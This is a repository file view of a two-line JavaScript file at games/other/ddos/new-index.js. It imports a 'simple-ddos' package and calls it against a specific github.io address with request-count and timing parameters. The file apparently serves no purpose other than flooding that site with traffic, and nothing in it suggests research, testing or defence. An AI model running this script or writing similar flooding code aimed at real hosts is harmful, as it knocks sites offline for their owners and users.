games/other/ddos/new-index.js
2023-02-28 14:01:06 +01:00

3 lines
95 B
JavaScript

import { simpleDDoS } from 'simple-ddos'
simpleDDoS(5, 'https://t0m0t0w.github.io', 500, 1000)